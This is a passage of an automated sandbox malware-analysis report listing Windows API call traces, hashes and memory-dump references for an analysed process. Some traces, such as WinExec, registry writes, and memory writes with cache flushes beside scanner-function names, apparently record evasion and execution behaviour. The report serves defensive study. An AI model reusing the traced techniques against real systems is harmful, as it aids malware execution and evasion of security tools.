                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$Exec
                                                                                                                                • String ID: Kernel32$WinExec
                                                                                                                                • API String ID: 2292790416-3609268280
                                                                                                                                • Opcode ID: 00445bc3f2f468ff41406bd0477a6c085d522418044261083e66a3065f5a1db8
                                                                                                                                • Instruction ID: dadd89077f8027fa2726a0c074b44ad7c31454d88bc1447ecee4c343b27a567e
                                                                                                                                • Opcode Fuzzy Hash: 00445bc3f2f468ff41406bd0477a6c085d522418044261083e66a3065f5a1db8
                                                                                                                                • Instruction Fuzzy Hash: E6018175684304BFF700EBA4ED81F5EB7ADF708B50F604460F900D2680DE38AD108A25
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E
                                                                                                                                  • Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                • WinExec.KERNEL32(?,?), ref: 02A18624
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$Exec
                                                                                                                                • String ID: Kernel32$WinExec
                                                                                                                                • API String ID: 2292790416-3609268280
                                                                                                                                • Opcode ID: 34c6e8c5474494447c1dd31b47bc0c79b950bb8aff01fce27a4abc98f4b01511
                                                                                                                                • Instruction ID: afd6b89dbdaccf5b46c56d4336e94d9517dd9afe72d11cb0ef8bbcc309c5b88e
                                                                                                                                • Opcode Fuzzy Hash: 34c6e8c5474494447c1dd31b47bc0c79b950bb8aff01fce27a4abc98f4b01511
                                                                                                                                • Instruction Fuzzy Hash: 9EF08175684304BFF700EBA4ED81F5EB7ADF708B50F604460F900D2680DE38AD108A25
                                                                                                                                APIs
                                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02A15D74,?,?,02A13900,00000001), ref: 02A15C88
                                                                                                                                • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02A15D74,?,?,02A13900,00000001), ref: 02A15CB6
                                                                                                                                  • Part of subcall function 02A07D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02A13900,02A15CF6,00000000,02A15D74,?,?,02A13900), ref: 02A07DAA
                                                                                                                                  • Part of subcall function 02A07F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02A13900,02A15D11,00000000,02A15D74,?,?,02A13900,00000001), ref: 02A07FB7
                                                                                                                                • GetLastError.KERNEL32(00000000,02A15D74,?,?,02A13900,00000001), ref: 02A15D1B
                                                                                                                                  • Part of subcall function 02A0A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02A0C3D9,00000000,02A0C433), ref: 02A0A797
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 503785936-0
                                                                                                                                • Opcode ID: 825488f9cfb7b1c14046e7a345e866b85e6c6214e7f5ee08247f30a1907f0bbc
                                                                                                                                • Instruction ID: a8e3825d0d05f346d37e27ef7c6f729b4e34f878c45708f47840124d54772a1e
                                                                                                                                • Opcode Fuzzy Hash: 825488f9cfb7b1c14046e7a345e866b85e6c6214e7f5ee08247f30a1907f0bbc
                                                                                                                                • Instruction Fuzzy Hash: 1231B330E403059FDB00EFA8DAC5B9EBBF6AB49714F908465D504AB3C0DF7569058FA1
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyA.ADVAPI32(?,00000000,02B7BA58), ref: 02A1F258
                                                                                                                                • RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02A1F2C3), ref: 02A1F290
                                                                                                                                • RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02A1F2C3), ref: 02A1F29B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 779948276-0
                                                                                                                                • Opcode ID: cdae79a3d940cfe989d116a5d42c1e43353a829cd56c156baab2f6031c18ccef
                                                                                                                                • Instruction ID: fea0cba15593f2e4e4df4541faca08d4c22a51ea49f1b49a78109b99a9c090b6
                                                                                                                                • Opcode Fuzzy Hash: cdae79a3d940cfe989d116a5d42c1e43353a829cd56c156baab2f6031c18ccef
                                                                                                                                • Instruction Fuzzy Hash: 9611F871A80244AFEB00EFA8E9C1E9E77EDFB08794B405471B614D7690DE30EE508F64
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyA.ADVAPI32(?,00000000,02B7BA58), ref: 02A1F258
                                                                                                                                • RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02A1F2C3), ref: 02A1F290
                                                                                                                                • RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02A1F2C3), ref: 02A1F29B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 779948276-0
                                                                                                                                • Opcode ID: f28ab6e09e61f5638148a45963cedceba20a8e5fde8c3c256a8324dd849f07b7
                                                                                                                                • Instruction ID: c777786ced1bea87b66f068ed1623506b798ec704dee0904605527ae7de62cd0
                                                                                                                                • Opcode Fuzzy Hash: f28ab6e09e61f5638148a45963cedceba20a8e5fde8c3c256a8324dd849f07b7
                                                                                                                                • Instruction Fuzzy Hash: 4011F871A80244AFEB00EFA8E9C1E9E77EDFB08794B405461B614D7690DE30EE508F64
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClearVariant
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                • Opcode ID: b784739485bc7e29859eeb575ad600a95295dc8618bc64506f338fdba2daa993
                                                                                                                                • Instruction ID: 4417bd4201f987638037b7a534e07a042a9c3d5bf6972cb5cec6e549f9e771ef
                                                                                                                                • Opcode Fuzzy Hash: b784739485bc7e29859eeb575ad600a95295dc8618bc64506f338fdba2daa993
                                                                                                                                • Instruction Fuzzy Hash: 12F04920748210C79B247B39BFC4A697FAAAF443507141CB6A406DB2D5DF64CC45EB63
                                                                                                                                APIs
                                                                                                                                • SysFreeString.OLEAUT32(02A1F4A4), ref: 02A04C6E
                                                                                                                                • SysAllocStringLen.OLEAUT32(?,?), ref: 02A04D5B
                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02A04D6D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: String$Free$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 986138563-0
                                                                                                                                • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                • Instruction ID: e415647e418c9ac2a51a28fa149184639ce7c95751dd2ac9c4740f4dcc02c19c
                                                                                                                                • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                • Instruction Fuzzy Hash: 06E0ECB82052055EEB146F21BAC0B77622AAFD9745B5484A9A900CA1D4DF389840AD38
                                                                                                                                APIs
                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 02A173DA
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeString
                                                                                                                                • String ID: H
                                                                                                                                • API String ID: 3341692771-2852464175
                                                                                                                                • Opcode ID: 05763058334a2a28eb042b25d9a791a374a91c5896150db4dd5c02710fb06c71
                                                                                                                                • Instruction ID: efed2d5f07eebb49824cdf47c746ff158a11311ad321ce69d317f037bcb3422b
                                                                                                                                • Opcode Fuzzy Hash: 05763058334a2a28eb042b25d9a791a374a91c5896150db4dd5c02710fb06c71
                                                                                                                                • Instruction Fuzzy Hash: A0B1C274A016089FDB15CF99D9C0A9DFBF2FF89324F1495A9E845AB360DB30A846CF50
                                                                                                                                APIs
                                                                                                                                • VariantCopy.OLEAUT32(00000000,00000000), ref: 02A0E781
                                                                                                                                  • Part of subcall function 02A0E364: VariantClear.OLEAUT32(?), ref: 02A0E373
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$ClearCopy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 274517740-0
                                                                                                                                • Opcode ID: 10b8c7c72e3b61f015c0709177543b4eb3d5e5c29f196f9c82d3f6347e41af86
                                                                                                                                • Instruction ID: 944a63e7f6c4461a5d1c82c495cd84c15aed3b59a9c73dc803d35be608fb5286
                                                                                                                                • Opcode Fuzzy Hash: 10b8c7c72e3b61f015c0709177543b4eb3d5e5c29f196f9c82d3f6347e41af86
                                                                                                                                • Instruction Fuzzy Hash: D111863074021087C734AF29EBC4A6677EAAF847507108C66E54A8B2D5EF30EC45EB62
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitVariant
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1927566239-0
                                                                                                                                • Opcode ID: 5945214234f4c33f161eb6dbb9e466bb5ad96b6a35f737ce9d36667602ef5f3e
                                                                                                                                • Instruction ID: de67ace0951f5f8fd91c7625f861fe07b6d2782540bdbf26e88f25579560af89
                                                                                                                                • Opcode Fuzzy Hash: 5945214234f4c33f161eb6dbb9e466bb5ad96b6a35f737ce9d36667602ef5f3e
                                                                                                                                • Instruction Fuzzy Hash: F1315271A00208ABDB50DFA8EAC4AAAB7F8EB0C314F544965F905D32C0DB37D950DBA1
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E
                                                                                                                                  • Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                  • Part of subcall function 02A17D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A17DEC
                                                                                                                                  • Part of subcall function 02A18338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02A183C2), ref: 02A183A4
                                                                                                                                • FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1478290883-0
                                                                                                                                • Opcode ID: 2491a042ea27dbba5d8c62d6967b3043f7806996849fad15af93b6b3c36a9df7
                                                                                                                                • Instruction ID: 167dc27c82f88973c5a0a9dedb426bf8aa934ade0393d4b6fa94612618d27023
                                                                                                                                • Opcode Fuzzy Hash: 2491a042ea27dbba5d8c62d6967b3043f7806996849fad15af93b6b3c36a9df7
                                                                                                                                • Instruction Fuzzy Hash: 9C210374AC0704BFF740F7A4EE82B5EB799EB04B50F5014A0F604E71C0DE74A9608A19
                                                                                                                                APIs
                                                                                                                                • CLSIDFromProgID.OLE32(00000000,?,00000000,02A16DB9,?,?,?,00000000), ref: 02A16D99
                                                                                                                                  • Part of subcall function 02A04C60: SysFreeString.OLEAUT32(02A1F4A4), ref: 02A04C6E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeFromProgString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4225568880-0
                                                                                                                                • Opcode ID: 7dcca02ad665ea3a27abe082d6f35980b550b7f8b629479e3a70de55dbb5397a
                                                                                                                                • Instruction ID: f9b0732b09595038fbfe94858c023ac4753bbdd806d38196c3e4c10679278690
                                                                                                                                • Opcode Fuzzy Hash: 7dcca02ad665ea3a27abe082d6f35980b550b7f8b629479e3a70de55dbb5397a
                                                                                                                                • Instruction Fuzzy Hash: DBE0E5352407087BE311EB62EE91D4E77ADEB8AB20B5104B1E500D3580DD716D008860
                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameA.KERNEL32(02A00000,?,00000105), ref: 02A05886
                                                                                                                                  • Part of subcall function 02A05ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A00000,02A2E790), ref: 02A05AE8
                                                                                                                                  • Part of subcall function 02A05ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A00000,02A2E790), ref: 02A05B06
                                                                                                                                  • Part of subcall function 02A05ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A00000,02A2E790), ref: 02A05B24
                                                                                                                                  • Part of subcall function 02A05ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A05B42
                                                                                                                                  • Part of subcall function 02A05ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02A05BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A05B8B
                                                                                                                                  • Part of subcall function 02A05ACC: RegQueryValueExA.ADVAPI32(?,02A05D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02A05BD1,?,80000001), ref: 02A05BA9
                                                                                                                                  • Part of subcall function 02A05ACC: RegCloseKey.ADVAPI32(?,02A05BD8,00000000,?,?,00000000,02A05BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A05BCB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2796650324-0
                                                                                                                                • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                • Instruction ID: ab771593308f76cde7167db4067424d97c003c09c863b916267438b268610dd5
                                                                                                                                • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                • Instruction Fuzzy Hash: ADE03971A002148BDB14DE98D9C0A863798AB08750F440961AC58CF286DBB0D9148BD4
                                                                                                                                APIs
                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02A07DF4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                • Instruction ID: 16c1215ec7bf26989713aecec3a98f47a9d5151b36c1d1314049f77e661e4170
                                                                                                                                • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                • Instruction Fuzzy Hash: 3DD05BB23091507AE224965A6DC4EB75BDCCBC6770F10063DF658C71C0D7209C01C6B1
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,02A2356F,ScanString,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,Initialize), ref: 02A07E8B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
